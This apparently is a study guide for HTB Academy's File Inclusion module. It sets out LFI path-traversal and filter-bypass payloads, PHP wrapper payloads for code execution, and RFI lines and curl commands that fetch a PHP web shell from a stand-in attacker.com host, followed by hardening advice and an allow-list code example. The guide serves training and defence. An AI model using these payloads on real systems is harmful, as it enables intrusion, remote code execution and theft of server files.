Complete guide covering Local File Inclusion (LFI), Remote File Inclusion (RFI), and advanced file inclusion techniques from HTB Academy's File Inclusion module.
- Basic LFI Techniques - Fundamentals, path traversal, common files, and HTB Academy labs
- Advanced Bypasses & PHP Filters - Filter bypasses, PHP filters, and source code disclosure
- PHP Wrappers for RCE - Data, Input, and Expect wrappers for remote code execution
- Remote File Inclusion (RFI) - HTTP, FTP, and SMB protocols for external file inclusion
- File Upload + LFI Combinations - Malicious image uploads, zip/phar wrappers
- Log Poisoning Techniques - Session, Apache, SSH, Mail, and FTP log poisoning
- Automated Scanning & Tools - Parameter discovery, wordlist fuzzing, automated tools
- Prevention & Hardening - Secure coding, server hardening, WAF protection
- Skills Assessment Walkthrough - Complete HTB Academy capstone challenge
# Basic path traversal
../../../../etc/passwd
../../../../windows/system32/drivers/etc/hosts
# Bypass filters
....//....//....//etc/passwd # Non-recursive bypass
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd # URL encoding
./languages/../../../../etc/passwd # Approved path bypass
../../../../etc/passwd%00 # Null byte (PHP < 5.3)
# Data wrapper
data://text/plain,<?php system($_GET['cmd']); ?>&cmd=id
# Input wrapper (POST)
curl -X POST --data '<?php system($_GET["cmd"]); ?>' "URL?file=php://input&cmd=whoami"
# Expect wrapper
expect://id
# PHP filters (source disclosure)
php://filter/convert.base64-encode/resource=index.php
# HTTP RFI
http://attacker.com/shell.php&cmd=id
# FTP RFI
ftp://attacker.com/shell.php&cmd=whoami
# SMB RFI (Windows)
\\attacker.com\share\shell.php&cmd=dir
# Apache/Nginx logs
/var/log/apache2/access.log
/var/log/nginx/access.log
# SSH logs
/var/log/auth.log
# PHP sessions
/var/lib/php/sessions/sess_SESSIONID
# Process environment
/proc/self/environ
All guides include complete solutions for the HTB Academy File Inclusion module labs:
- Basic LFI Lab - Finding users and reading flags
- LFI Bypasses Lab - Non-recursive and encoding bypasses
- PHP Filters Lab - Source code disclosure techniques
- PHP Wrappers Lab - RCE via data, input, and expect wrappers
- RFI Lab - HTTP, FTP, and SMB remote file inclusion
- File Upload + LFI Lab - Malicious image uploads and wrapper techniques
- Log Poisoning Lab - Session poisoning and Apache log injection
- Automated Scanning Lab - Parameter discovery and fuzzing techniques
- Prevention Lab - PHP configuration and security hardening
- Skills Assessment - Multi-technique exploitation chain
# Basic LFI testing
curl "http://target.com/lfi.php?file=../../../../etc/passwd"
# PHP filter source disclosure
curl "http://target.com/lfi.php?file=php://filter/convert.base64-encode/resource=index.php"
# RFI with remote shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python3 -m http.server 80
curl "http://target.com/lfi.php?file=http://attacker.com/shell.php&cmd=id"
- ffuf - Parameter and payload fuzzing
- LFiFreak - Automated LFI exploitation
- liffy - LFI exploitation tool
- kadimus - LFI/RFI scanner and exploiter
- Burp Suite - Parameter discovery and testing
/opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt
/opt/useful/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt
# Parameter identification
ffuf -w burp-parameter-names.txt:FUZZ -u "http://target.com/page.php?FUZZ=test"
# Basic LFI testing
ffuf -w lfi-linux.txt:FUZZ -u "http://target.com/page.php?file=FUZZ" -mc 200
# Test for RCE capabilities
# 1. Try PHP wrappers (data, input, expect)
# 2. Attempt RFI (HTTP, FTP, SMB)
# 3. File upload + LFI combinations
# 4. Log poisoning techniques
# System enumeration
# Flag discovery
# Privilege escalation
# Persistent access
- Input validation and sanitization
- Whitelist allowed files/paths
- Use basename() for file operations
- Avoid user input in file functions
# php.ini security settings
allow_url_fopen = Off
allow_url_include = Off
open_basedir = /var/www/html
disable_functions = system,exec,shell_exec,passthru
- ModSecurity rules for LFI detection
- Path traversal pattern blocking
- PHP wrapper filtering
- Null byte injection prevention
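An added example, not taken from the HTB module or this guide, showing the allow-list and basename() approach from the secure-coding list above next to the raw include pattern it replaces; the page directory, page names and function names are assumed.

```php
<?php
// Added example (not from the HTB module or this guide). Directory, page
// names and function names are assumptions made for illustration.

// Vulnerable pattern: the request parameter reaches include() unchanged, so
// "../" sequences, php://filter or data:// wrappers and remote URLs are all
// honoured by the interpreter.
function vulnerableInclude(string $file): void
{
    include $file;
}

// Hardened version: the request is matched against a fixed allow-list and the
// resolved path is re-checked against the approved directory, so user input
// never reaches a filesystem function directly.
const PAGE_DIR = __DIR__ . '/languages';
const ALLOWED_PAGES = ['en.php', 'es.php', 'de.php'];

function resolvePage(string $requested): ?string
{
    // basename() keeps only the final path segment, so "../../etc/passwd"
    // becomes "passwd" and "php://filter/.../resource=index.php" becomes
    // "resource=index.php"; neither survives the allow-list check below.
    $name = basename($requested);
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }
    // Second check: the real path must still sit inside PAGE_DIR, which also
    // covers the "./languages/../../../etc/passwd" style approved-path bypass.
    $base = realpath(PAGE_DIR);
    $real = realpath(PAGE_DIR . '/' . $name);
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$page = resolvePage($_GET['language'] ?? 'en.php');
if ($page === null) {
    http_response_code(400);
    exit('Unknown page');
}
include $page;
```

Combined with the php.ini settings above (allow_url_include = Off, open_basedir), the allow-list removes the traversal, wrapper and RFI paths at the application layer rather than relying on the interpreter configuration alone.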
🟢 Beginner → Basic LFI Techniques
🟡 Intermediate → Advanced Bypasses → PHP Wrappers
🟠 Advanced → RFI → Log Poisoning
🔴 Expert → Automated Scanning → Skills Assessment
This comprehensive file inclusion guide covers 100% of HTB Academy's File Inclusion module, providing practical knowledge for both offensive security testing and defensive implementation.